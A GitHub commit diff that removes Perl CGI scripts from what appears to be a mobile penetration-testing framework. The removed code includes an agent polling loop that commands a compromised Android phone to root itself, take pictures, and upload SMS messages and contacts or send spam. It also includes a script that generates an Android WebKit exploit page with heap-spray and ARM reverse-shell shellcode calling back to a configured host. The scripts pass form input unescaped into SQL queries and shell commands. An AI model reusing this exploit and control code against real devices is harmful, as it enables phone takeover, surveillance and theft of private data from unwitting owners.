Permalink
Browse files

pulled gui for patches

  • Loading branch information...
1 parent 16310b4 commit ee55179a8353f46f9a1bb032e66a61f00c3f13e6 @georgiaw committed Oct 24, 2012
View
BIN frameworkgui/AndroidAgent.apk
Binary file not shown.
View
83 frameworkgui/CSAttack.pl
@@ -1,83 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$exploit = $FORM{"exploit"};
-$hPath = $FORM{"hostingPath"};
-$fileName = $FORM{"fileName"};
-$phNo2Attack = $FORM{"phNo2Attack"};
-$modemNo = $FORM{"modemNoDD2"};
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT id from modems where number=" . $modemNo;
-
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
-$startcommand = "perl androidwebkit.pl " . $hPath . " " . $fileName . " " . $phNo2Attack . " " . $modem;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
-
- system($startcommand);
-
-
- }
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
View
80 frameworkgui/SEAttack.pl
@@ -1,80 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$platform = $FORM{"platformDD2"};
-$path = $FORM{"hostingPath"};
-$filename = $FORM{"fileName"};
-$number = $FORM{"phNo2Attack"};
-$modemNo = $FORM{"modemNoDD2"};
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
-
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
-
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
-$selectquery = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
-$startcommand = "perl directdownload.pl " . $path . " " . $filename .
-" " . $number . " " . $platform . " " . $modem;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
-
- system($startcommand);
-}
-#print $startcommand;
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
View
664 frameworkgui/agentpoll.pl
@@ -1,664 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-use Expect;
-use IO::Socket;
-$configfile = "config";
- open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-$ipaddress = $Variables{"IPADDRESS"};
-$webserver = $Variables{"WEBSERVER"};
-$path = $ARGV[0];
-$key = $ARGV[1];
-$id = $ARGV[2];
-$sqlserver = $Variables{"MYSQLSERVER"};
-while(1)
- {
- $fullpath5 = $webserver . $path . "/putfunc";
- open(PUTFILE, "+<$fullpath5");
- $line= <PUTFILE>;
- close(PUTFILE);
- open(PUTFILE2, ">$fullpath5");
- print PUTFILE2;
- close(PUTFILE2);
- $catcommand = "cat " . $fullpath5 . " | sed '1d' > hold";
- system($catcommand);
- $catcommand2 = "mv hold " . $fullpath;
- system($catcommand);
- @split = split(/ /, $line);
- if (@split[0] eq $key)
- {
- if (@split[1] eq "ROOT")
- {
- $delivery = @split[2];
- chomp($delivery);
- $command = $key . " " . "ROOT";
- if ($delivery eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- if ($line eq "Root Succeeded")
- {
- $table = "data";
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $yes = "yes";
- $insertquery = "UPDATE $table SET root=" . "'" . $yes . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- }
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- if ($delivery eq "SMS")
- {
- $modem = @split[3];
- chomp($modem);
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- if ($line eq "Root Succeeded")
- {
- $table = "data";
- $yes = "yes";
- $insertquery = "UPDATE $table SET root=" . "'" . $yes . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- }
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
-
- }
-
-
- }
- elsif (@split[1] eq "PICT")
- {
- $delivery = @split[2];
- chomp($delivery);
- $command = $key . " " . "PICT";
- if ($delivery eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 30;
- $picturefile = $webserver . $path . "/picture.jpg";
- open(PICTURE, "+<$picturefile");
- if (!(-z PICTURE))
- {
- $command = "cp" . " " . $picturefile . " " . ".";
- system($command);
- $picturedir = getcwd();
- $table = "data";
- $picture = $picturedir . "/" . "picture.jpg";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $insertquery = "UPDATE $table SET picture=" . "'" . $picture . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(PICTURE);
- open(PICTURE2, ">$picturefile");
- print PICTURE2 "";
- close(PICTURE2);
- }
-
- }
- if ($delivery eq "SMS")
- {
- $modem = @split[3];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep(60);
- $picturefile = $webserver . $path . "/picture.jpg";
- open(PICTURE, "+<$picturefile");
- if (!(-z PICTURE))
- {
- $command = "cp" . " " . $picturefile . " " . ".";
- system($command);
- $picturedir = getcwd();
- $table = "data";
- $picture = $picturedir . "/" . "picture.jpg";
- $insertquery = "UPDATE $table SET picture=" . "'" . $picture . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(PICTURE);
- open(PICTURE2, ">$picturefile");
- print PICTURE2 "";
- close(PICTURE2);
- }
-
- }
- }
- elsif (@split[1] eq "SMSS")
- {
- $deliverymethod = @split[2];
- $returnmethod = @split[3];
- chomp($returnmethod);
- if ($returnmethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $command = $key . " " . "SMSS" . " " . $returnmethod;
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- if ($deliverymethod eq "SMS")
- {
- print "SMS";
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- }
- if ($returnmethod eq "HTTP")
- {
- $command = $key . " " . "SMSS" . " " . "WEB";
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 30;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- $sql->execute;
- }
- if ($deliverymethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- }
-
- }
- elsif (@split[1] eq "CONT")
- {
- $deliverymethod = @split[2];
- $returnmethod = @split[3];
- chomp($returnmethod);
- if ($returnmethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $command = $key . " " . "CONT" . " " . $returnmethod;
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
-
-
- }
- if ($deliverymethod eq "SMS")
- {
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path2 . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
-
-
- }
-
- }
-
- if ($returnmethod eq "HTTP")
- {
- $command = $key . " " . "CONT" . " " . "WEB";
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- sleep 30;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
- if ($deliverymethod eq "SMS")
- {
- $modem = @split[4];
- chomp($modem);
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- $typequery = "SELECT type from modems where id=" . $modem;
- $sql = $dbh->prepare($typequery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $type2 = @rows[0];
- if ($type2 eq "app")
- {
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command; $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- sleep 60;
- $text = $webserver . $path . "/text.txt";
- open(TEXTFILE, "+<$text");
- $line= <TEXTFILE>;
- $table = "data";
- $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $id . "'";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- close(TEXTFILE);
- open(TEXTFILE2, ">$text");
- print TEXTFILE2 "";
- close(TEXTFILE2);
- }
-
- }
- }
-
- }
- elsif (@split[1] eq "SPAM")
- {
- $modem = @split[2];
- $sendnumber = @split[4];
- $deliverymethod = @split[3];
- $splitlength = @split;
- $end = $splitlength - 1;
- $sendmessage = @split[5];
- if ($end > 5)
- {
- for ($i = 6; $i<=$end; $i++)
- {
- $sendmessage .= " ";
- $sendmessage .= @split[$i];
- }
- }
- $command = $key . " " . "SPAM" . " " . $sendnumber . " " . $sendmessage;
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/control";
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
- }
- if ($deliverymethod eq "SMS")
- {
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $typequery = "SELECT type from modems where id=" . $modem;
- $sql = $dbh->prepare($typequery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $type2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $numberquery = "SELECT number from agents where id=" . $id;
- $sql = $dbh->prepare($numberquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $number2 = @rows[0];
- chomp($type2);
- if ($type2 eq "app")
- {
- $control = $webserver . $path2 . "/getfunc";
- $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
- open(CONTROLFILE, ">$control");
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- }
- }
-
-
- }
-
-
- }
-}
-
View
155 frameworkgui/androidwebkit.pl
@@ -1,155 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-use Expect;
-use IO::Socket;
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$webserver = $Variables{"WEBSERVER"};
- $sqlserver = $Variables{"MYSQLSERVER"};
- $ipaddress = $Variables{"IPADDRESS"};
- $shellipaddress = $Variables{"SHELLIPADDRESS"};
- $path = $ARGV[0];
- $filename = $ARGV[1];
- $number = $ARGV[2];
- $modem = $ARGV[3];
- $link = "http://" . $ipaddress . $path . $filename;
- $fullpath = $webserver. $path;
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $ipaddresscopy = $shellipaddress;
- @octets = split(/\./, $ipaddresscopy);
- $out1 = pack "c", @octets[0];
- $hex1 = unpack "H2" , $out1;
- $out2 = pack "c", @octets[1];
- $hex2 = unpack "H2" , $out2;
- $out3 = pack "c", @octets[2];
- $hex3 = unpack "H2" , $out3;
- $out4 = pack "c", @octets[3];
- $hex4 = unpack "H2" , $out4;
- $sploitfile = $webserver . $path . $filename;
- $command8 = "touch " . $sploitfile;
- system($command8);
- $command9 = "chmod 777 " . $sploitfile;
- system($command9);
- open(SPLOITFILE, ">$sploitfile");
- print SPLOITFILE "<html>\n";
- print SPLOITFILE "<head>\n";
- print SPLOITFILE "<script>\n";
- print SPLOITFILE "var ip = unescape(\"\\u" . $hex2 . $hex1 . "\\u" . $hex4 . $hex3 . "\");\n";
- print SPLOITFILE "var port = unescape(\"\\u3930\");\n";
- print SPLOITFILE "function trigger()\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "var span = document.createElement(\"div\");\n";
- print SPLOITFILE "document.getElementById(\"BodyID\").appendChild(span);\n";
- print SPLOITFILE "span.innerHTML = -parseFloat(\"NAN(ffffe00572c60)\");\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "function exploit()\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "var nop = unescape(\"\\u33bc\\u0057\");\n";
- print SPLOITFILE "do\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "nop+=nop;\n";
- print SPLOITFILE "} while (nop.length<=0x1000);\n";
- print SPLOITFILE "var scode = nop+unescape(\"\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002\");\n";
- print SPLOITFILE "scode += port;\n";
- print SPLOITFILE "scode += ip;\n";
- print SPLOITFILE "scode += unescape(\"\\u2000\\u2000\");\n";
- print SPLOITFILE "target = new Array();\n";
- print SPLOITFILE "for(i = 0; i < 0x1000; i++)\n";
- print SPLOITFILE "target[i] = scode;\n";
- print SPLOITFILE "for (i = 0; i <= 0x1000; i++)\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "document.write(target[i]+\"<i>\");\n";
- print SPLOITFILE "if (i>0x999)\n";
- print SPLOITFILE "{\n";
- print SPLOITFILE "trigger();\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "}\n";
- print SPLOITFILE "</script>\n";
- print SPLOITFILE "</head>\n";
- print SPLOITFILE "<body id=\"BodyID\">\n";
- print SPLOITFILE "Enjoy!\n";
- print SPLOITFILE "<script>\n";
- print SPLOITFILE "exploit();\n";
- print SPLOITFILE "</script>\n";
- print SPLOITFILE "</body>\n";
- print SPLOITFILE "</html>\n";
- close(SPLOITFILE);
-
- $username = $Variables{"MYSQLUSER"};
